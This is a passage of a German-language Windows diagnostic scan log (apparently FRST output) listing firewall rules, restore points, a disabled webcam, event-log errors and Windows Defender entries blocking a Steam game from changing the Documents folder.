-> ) FirewallRules: [{819EEF0C-A66D-4B13-AE52-372B8C4417FB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{6EC5B841-2D65-462E-9D98-09F39BF628D5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{04D75BF3-9460-4D0A-A4D7-1502C365E3EB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{2B271BC7-FE06-49D7-93DA-536ED922681D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{95213788-1B97-4E49-8189-1432C240E150}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aperture Tag\portal2.exe () [Datei ist nicht signiert] FirewallRules: [{16C58C8B-DA6D-4D0F-97AC-FD14D27CA572}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Aperture Tag\portal2.exe () [Datei ist nicht signiert] FirewallRules: [TCP Query User{AAC4AA3C-68A2-426C-BD58-B78451E1793A}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe FirewallRules: [UDP Query User{AEAE6F33-1ACA-4DBB-AA21-50BDD5B17F14}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-gamma\windows-x64\java-runtime-gamma\bin\javaw.exe FirewallRules: [TCP Query User{AC1AEE34-F90D-4E27-B0D4-D2DEE7CF7E78}C:\program files\ultimaker cura 5.5.0\ultimaker-cura.exe] => (Allow) C:\program files\ultimaker cura 5.5.0\ultimaker-cura.exe () [Datei ist nicht signiert] FirewallRules: [UDP Query User{9F13C120-86C8-42E2-9742-08ED00FDBAC4}C:\program files\ultimaker cura 
5.5.0\ultimaker-cura.exe] => (Allow) C:\program files\ultimaker cura 5.5.0\ultimaker-cura.exe () [Datei ist nicht signiert] FirewallRules: [TCP Query User{F520C8E2-BCBB-4F84-A5CF-357018C357BF}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [UDP Query User{F129C453-4F2D-4BD8-B594-1AE517108017}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe (Epic Games Inc. -> Epic Games, Inc.) FirewallRules: [{A3C56F05-23E8-4FBE-BAE7-3EAD3BDCDA59}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Demo\stanley.exe () [Datei ist nicht signiert] FirewallRules: [{9316E500-E48D-40C8-BE89-35370F8AEA0A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Demo\stanley.exe () [Datei ist nicht signiert] FirewallRules: [{FB6F5ACB-1BA6-45E0-B74E-3848DB024352}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Ultra Deluxe\The Stanley Parable Ultra Deluxe.exe () [Datei ist nicht signiert] FirewallRules: [{09E7C842-072A-45C2-8F46-7E202AE6B99C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\The Stanley Parable Ultra Deluxe\The Stanley Parable Ultra Deluxe.exe () [Datei ist nicht signiert] FirewallRules: [{3EC9FD54-2CE9-4DEB-AC1F-B5DFE8FB748A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Revolution\bin\win64\revolution.exe () [Datei ist nicht signiert] FirewallRules: [{0DCF3680-70CB-4AAA-B4F1-478E827B6903}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Revolution\bin\win64\revolution.exe () [Datei ist nicht signiert] FirewallRules: [{E9F41C2D-B88D-46AE-A78F-2E76847FACFF}] => (Allow) C:\Program Files 
(x86)\Steam\steamapps\common\Portal 2\portal2.exe () [Datei ist nicht signiert] FirewallRules: [{4D08CEFB-4146-495A-9F61-F321D1D68C0D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal 2\portal2.exe () [Datei ist nicht signiert] FirewallRules: [{99F1FB24-4658-42E8-99EA-E1B8507D003E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Reloaded\portal2.exe () [Datei ist nicht signiert] FirewallRules: [{DC4421FF-EC22-4B4C-807A-FC9CB95626BB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Portal Reloaded\portal2.exe () [Datei ist nicht signiert] FirewallRules: [TCP Query User{A1FC9D33-19D1-4E27-A949-4C10690A1528}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe FirewallRules: [UDP Query User{5F74F7B2-BF81-47D2-B13F-707AE86FDBE8}C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\java-runtime-beta\windows-x64\java-runtime-beta\bin\javaw.exe FirewallRules: [TCP Query User{D492A8E2-81AE-41DF-9811-A0F149828BC1}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [UDP Query User{BB605A84-C0DF-4936-95F4-9C997F707D24}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN) FirewallRules: [{BE492809-23CE-4298-A28D-623B9622E14F}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3102.2733.5911_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{059405E0-5C48-4963-BADB-E888432AE375}] => (Allow) C:\Program Files\WindowsApps\MicrosoftTeams_24060.3102.2733.5911_x64__8wekyb3d8bbwe\msteams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: 
[TCP Query User{03AE9F99-E45E-4247-AD70-668379C0C9A8}C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe FirewallRules: [UDP Query User{191C35FA-6BF8-4795-A7B3-962E74C79BD7}C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe] => (Allow) C:\users\skysc\curseforge\minecraft\install\runtime\jre-legacy\windows-x64\jre-legacy\bin\javaw.exe FirewallRules: [TCP Query User{0EF41AE0-12CC-467C-BADA-19A8DEBDFE53}C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe] => (Allow) C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe => Keine Datei FirewallRules: [UDP Query User{67777DE3-C231-445A-BAC1-5F12FCEB141D}C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe] => (Allow) C:\users\skysc\appdata\roaming\twitch studio\bin\twitchstudioagent.exe => Keine Datei FirewallRules: [{9C536DC2-21BB-4CE5-AF43-D5CD1A611D79}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) FirewallRules: [{8B5CC2F8-BED7-4A43-AC52-8FF6349C25AF}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) FirewallRules: [{186D8BBB-DFF8-4FD4-BF74-5A4BB204AF23}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) FirewallRules: [{26A85371-1429-487A-80C8-D24441260E6A}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\iTunes.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) 
FirewallRules: [{E246D769-511C-40AB-9AEF-F784838F32FD}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) FirewallRules: [{5CC1D32F-52D6-4273-952E-19BEB207E296}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) FirewallRules: [{B7EACA3F-40CC-465E-AEDA-BA510D925730}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) FirewallRules: [{B0A2CC8C-A43B-4514-AECD-52DD1E3FBD77}] => (Allow) C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (5BD5593D-A41B-4F89-884E-B4F3E0FBAA75 -> Apple Inc.) FirewallRules: [{7D0812B6-5D0F-40E6-A517-0689AECB4A7C}] => (Allow) C:\Program Files\PowerToys\PowerToys.MouseWithoutBorders.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{C43E0354-F7A6-43B9-8E57-467E287C9965}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei FirewallRules: [{38036F52-FBF2-4B5D-9BCF-9CA728E4AAB4}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei FirewallRules: [{C1E51BF4-2B1F-4611-BF0F-BCFD2C14D1CB}] => (Block) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei FirewallRules: [{F232B7A7-34E6-40DD-B53F-834BC9B7B89C}] => (Block) C:\Program Files (x86)\Overwolf\0.254.0.12\OverwolfBrowser.exe => Keine Datei FirewallRules: [{7B9B44BA-FBDC-45E3-9BE0-243F34F9722D}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.13\OverwolfBrowser.exe (Overwolf Ltd -> Overwolf LTD) FirewallRules: [{0A0DCC37-A8F6-4799-BC0E-CF3EC9CD8988}] => (Allow) C:\Program Files (x86)\Overwolf\0.254.0.13\OverwolfBrowser.exe (Overwolf 
Ltd -> Overwolf LTD) FirewallRules: [{FDE41B83-5853-4D9C-BF0E-26ABAB316FCA}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) FirewallRules: [{C76B59C9-75A2-480D-8E78-A7C609270920}] => (Allow) C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe (Brave Software, Inc. -> Brave Software, Inc.) FirewallRules: [{65361A39-314F-4045-BE67-9D049DDDBB6C}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.113\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{C45B4906-B767-4668-BBE6-BAF7410971E1}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{E1135128-0AB2-4225-87A3-1C23586CA1AF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{D258953C-9615-4ABB-8505-DE2382165AE3}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{B566703B-0F9E-4CF3-95E7-C8942095906C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{DC2864B3-59E4-4748-95D8-BE2BD6C00B9F}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{8C681889-1E2F-499E-AF19-1B61798346E1}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{64DA0766-AC96-4B28-BF47-B81EE1A3B036}] => (Allow) C:\Program 
Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{022B2104-48BB-401B-ACEC-F8458664D7BC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{D5CF90E8-3235-4B34-8733-336BA49A9529}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{C4CB79B6-2B8D-4D7A-9FC2-1466C3EEFB1C}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0\Spotify.exe (453637B3-4E12-4CDF-B0D3-2A3C863BF6EF -> Spotify Ltd) FirewallRules: [{F128A7E7-6C38-46B9-B2D1-4F41FAC84F79}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe () [Datei ist nicht signiert] FirewallRules: [{01069CDF-BFED-4883-B436-B219979AC740}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe () [Datei ist nicht signiert] FirewallRules: [TCP Query User{5E40FAB9-8B7F-430A-8E84-083ED550DF39}C:\users\skysc\appdata\local\programs\launcher\lunar client.exe] => (Allow) C:\users\skysc\appdata\local\programs\launcher\lunar client.exe (Moonsworth, LLC -> Moonsworth LLC) FirewallRules: [UDP Query User{F56FAB9B-93B8-4354-9405-3CCDB309D519}C:\users\skysc\appdata\local\programs\launcher\lunar client.exe] => (Allow) C:\users\skysc\appdata\local\programs\launcher\lunar client.exe (Moonsworth, LLC -> Moonsworth LLC) FirewallRules: [{30A22C5C-2C44-47C9-82D3-EE3A68C4609D}] => (Allow) LPort=32683 FirewallRules: [{328C1465-ABBE-4C6B-98D4-C01A68A16288}] => (Allow) LPort=26822 ==================== Wiederherstellungspunkte ========================= 17-07-2024 19:25:24 ScanGuard-Installation 18-07-2024 16:44:58 Revo Uninstaller's restore point - SpyHunter 5 18-07-2024 16:46:51 Revo Uninstaller's restore point - AVG 
AntiVirus Free 20-07-2024 14:38:51 Revo Uninstaller's restore point - ScanGuard 21-07-2024 13:51:58 Revo Uninstaller's restore point - ReMouse Standard ==================== Fehlerhafte Geräte im Gerätemanager ============ Name: GENERAL WEBCAM Description: USB-Videogerät Class Guid: {ca3e7ab9-b4c3-4ae6-8251-579ef933890f} Manufacturer: Microsoft Service: usbvideo Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Fehlereinträge in der Ereignisanzeige: ======================== Applikationsfehler: ================== Error: (07/22/2024 05:28:50 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\skysc\AppData\Local\CapCut\CapCut.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile . Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_6ec0f0a887fe525b.manifest. Komponente 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_2713b9d173822955.manifest. Error: (07/22/2024 05:28:50 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\skysc\AppData\Local\CapCut\CapCut.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile . Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_6ec0f0a887fe525b.manifest. 
Komponente 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_2713b9d173822955.manifest. Error: (07/22/2024 04:11:54 PM) (Source: Application Error) (EventID: 1000) (User: SKYSGAMINGPC-CA) Description: Name der fehlerhaften Anwendung: MSI_GamebarTool.exe, Version: 2.0.0.11, Zeitstempel: 0xd36e1d1f Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.22621.3880, Zeitstempel: 0xdb9989e8 Ausnahmecode: 0xe0434352 Fehleroffset: 0x000000000005fabc ID des fehlerhaften Prozesses: 0x0x2104 Startzeit der fehlerhaften Anwendung: 0x0x1dadc4109750844 Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll Berichtskennung: 5eee3519-d3f1-4ffb-b485-885c2e0fe209 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (07/22/2024 04:11:53 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Anwendung: MSI_GamebarTool.exe Frameworkversion: v4.0.30319 Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet. 
Ausnahmeinformationen: System.IO.FileNotFoundException bei WpfApp10.App.Application_Startup(System.Object, System.Windows.StartupEventArgs) bei System.Windows.Application.OnStartup(System.Windows.StartupEventArgs) bei System.Windows.Application.<.ctor>b__1_0(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.DispatcherOperation.InvokeImpl() bei MS.Internal.CulturePreservingExecutionContext.CallbackWrapper(System.Object) bei System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) bei MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object) bei System.Windows.Threading.DispatcherOperation.Invoke() bei System.Windows.Threading.Dispatcher.ProcessQueue() bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) bei 
MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) bei System.Windows.Application.RunDispatcher(System.Object) bei System.Windows.Application.RunInternal(System.Windows.Window) bei WpfApp10.App.Main() Error: (07/22/2024 03:43:34 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Users\skysc\AppData\Local\CapCut\CapCut.exe". Fehler in Manifest- oder Richtliniendatei "" in Zeile . Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_6ec0f0a887fe525b.manifest. Komponente 2: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22621.3672_none_2713b9d173822955.manifest. Error: (07/22/2024 02:39:37 PM) (Source: Microsoft-Windows-Perflib) (EventID: 1023) (User: SKYSGAMINGPC-CA) Description: Windows kann die erweiterbare Leistungsindikator-DLL "C:\Windows\system32\sysmain.dll" nicht laden (Win32-Fehlercode 126). 
Error: (07/22/2024 02:39:31 PM) (Source: Application Error) (EventID: 1000) (User: SKYSGAMINGPC-CA) Description: Name der fehlerhaften Anwendung: MSI_GamebarTool.exe, Version: 2.0.0.11, Zeitstempel: 0xd36e1d1f Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.22621.3880, Zeitstempel: 0xdb9989e8 Ausnahmecode: 0xe0434352 Fehleroffset: 0x000000000005fabc ID des fehlerhaften Prozesses: 0x0x20bc Startzeit der fehlerhaften Anwendung: 0x0x1dadc342b3a6acc Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe Pfad des fehlerhaften Moduls: C:\Windows\System32\KERNELBASE.dll Berichtskennung: 028ee171-1257-45da-bc76-6b0712be39ff Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (07/22/2024 02:39:24 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Anwendung: MSI_GamebarTool.exe Frameworkversion: v4.0.30319 Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet. 
Ausnahmeinformationen: System.IO.FileNotFoundException bei WpfApp10.App.Application_Startup(System.Object, System.Windows.StartupEventArgs) bei System.Windows.Application.OnStartup(System.Windows.StartupEventArgs) bei System.Windows.Application.<.ctor>b__1_0(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.DispatcherOperation.InvokeImpl() bei MS.Internal.CulturePreservingExecutionContext.CallbackWrapper(System.Object) bei System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) bei System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object) bei MS.Internal.CulturePreservingExecutionContext.Run(MS.Internal.CulturePreservingExecutionContext, System.Threading.ContextCallback, System.Object) bei System.Windows.Threading.DispatcherOperation.Invoke() bei System.Windows.Threading.Dispatcher.ProcessQueue() bei System.Windows.Threading.Dispatcher.WndProcHook(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndWrapper.WndProc(IntPtr, Int32, IntPtr, IntPtr, Boolean ByRef) bei MS.Win32.HwndSubclass.DispatcherCallbackOperation(System.Object) bei System.Windows.Threading.ExceptionWrapper.InternalRealCall(System.Delegate, System.Object, Int32) bei System.Windows.Threading.ExceptionWrapper.TryCatchWhen(System.Object, System.Delegate, System.Object, Int32, System.Delegate) bei System.Windows.Threading.Dispatcher.LegacyInvokeImpl(System.Windows.Threading.DispatcherPriority, System.TimeSpan, System.Delegate, System.Object, Int32) bei 
MS.Win32.HwndSubclass.SubclassWndProc(IntPtr, Int32, IntPtr, IntPtr) bei MS.Win32.UnsafeNativeMethods.DispatchMessage(System.Windows.Interop.MSG ByRef) bei System.Windows.Threading.Dispatcher.PushFrameImpl(System.Windows.Threading.DispatcherFrame) bei System.Windows.Application.RunDispatcher(System.Object) bei System.Windows.Application.RunInternal(System.Windows.Window) bei WpfApp10.App.Main() Systemfehler: ============= Error: (07/22/2024 04:13:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung. Error: (07/22/2024 04:13:24 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Google Update-Dienst (gupdate) erreicht. Error: (07/22/2024 04:11:23 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 6 Mal passiert. Error: (07/22/2024 04:11:23 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet: Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt. Error: (07/22/2024 04:11:22 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 5 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts. Error: (07/22/2024 04:11:22 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet: Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt. 
Error: (07/22/2024 04:11:21 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "GameInput Service" wurde unerwartet beendet. Dies ist bereits 4 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 1000 Millisekunden durchgeführt: Neustart des Diensts. Error: (07/22/2024 04:11:21 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Der Dienst "GameInput Service" wurde mit folgendem Fehler beendet: Die Verbunddatei "GameInput Service" wurde mit einer neueren Version erstellt. Windows Defender: ================ Date: 2024-07-22 17:28:46 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {7AC7B037-E956-44C8-9B4C-DB9240EE71AB} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-07-21 13:35:58 Description: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern. Erkennungszeit: 2024-07-21T11:35:58.436Z Benutzer: SKYSGAMINGPC-CA\skysc Pfad: %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente Prozessname: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe Sicherheitsversion: 1.415.215.0 Modulversion: 1.1.24060.5 Produktversion: 4.18.24060.7 Date: 2024-07-20 15:26:46 Description: Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet. Überprüfungs-ID: {B889A637-0393-4E52-937D-977966347CE0} Überprüfungstyp: Antimalware Überprüfungsparameter: Schnellüberprüfung Benutzer: NT-AUTORITÄT\SYSTEM Date: 2024-07-20 14:46:03 Description: C:\Program Files (x86)\Steam\steamapps\common\Banana\Banana.exe wurde durch den überwachten Ordnerzugriff daran gehindert, %userprofile%\OneDrive\Microsoft Edge Drop Files\Dokumente zu ändern. 
